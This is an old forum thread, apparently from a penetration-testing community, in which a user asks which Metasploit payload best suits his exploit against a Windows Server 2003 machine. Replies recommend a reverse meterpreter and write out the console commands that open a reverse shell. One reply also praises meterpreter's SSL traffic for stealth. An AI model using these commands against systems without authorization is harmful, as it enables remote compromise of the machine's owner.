- This topic has 8 replies, 6 voices, and was last updated 9 years, 1 month ago by
nytfox.
-
AuthorPosts
-
-
November 11, 2011 at 6:58 pm #7027
midnight monster
ParticipantHello there!
i have a problem witn metasploit i dont wich of payloads is best for my exploit ( i know the server vulnerabilite and i sure about my expliot )and when i use “show payloads” command i see a lot of compatible payloads please help me to find the best payload -
November 11, 2011 at 7:08 pm #43613
mambru
ParticipantThe “best” payload to use will depend on you scenario.
http://www.offensive-security.com/metasploit-unleashed/Payload_Types
-
November 11, 2011 at 9:32 pm #43614
24772433
ParticipantTry each one and see which works best for you! That’s part of the fun of Metasploit. For each one that doesn’t work try to find out why!
Steve
-
November 12, 2011 at 2:24 am #43615
BillV
ParticipantAs previously mentioned we don’t know your environment, or your target for that matter.
If it’s within a local lab environment, targeting a Windows system, give the reverse meterpreter a try…
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 8888
exploit -
November 12, 2011 at 7:57 pm #43616
midnight monster
Participantoh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me
-
November 12, 2011 at 11:08 pm #43617
-
November 12, 2011 at 11:34 pm #43618
Anonymous
ParticipantOn Windows, a meterpreter is always better because all windows post modules support it (plus tons of features). It also communicates in SSL, so that adds a bit more stealth. On Linux though, it’s a different story, honestly you’re probably better off with a non-meterpreter shell, because the Linux meterpreter isn’t as good as the windows one.
reverse vs bind… come to think about it, I almost never use bind these days on a machine behind a firewall. But people do use bind shells.
By the way, when you select an exploit, and do “show payloads” — that will only show all the payloads compatible with that particular exploit. If you’re testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).
If you’re still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.
Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly.
And yes… I did sign up for an account here just to answer your question.
-
November 13, 2011 at 6:16 am #43619
midnight monster
ParticipantThank you msfsinn3r your info was very useful for me
my sever is windows server 2003
and thanks alot -
January 29, 2012 at 8:50 am #43620
nytfox
Participantbtw you can use search commend to get selected exploits , like “search smb” . try it and lemme know 🙂
-
-
AuthorPosts
- You must be logged in to reply to this topic.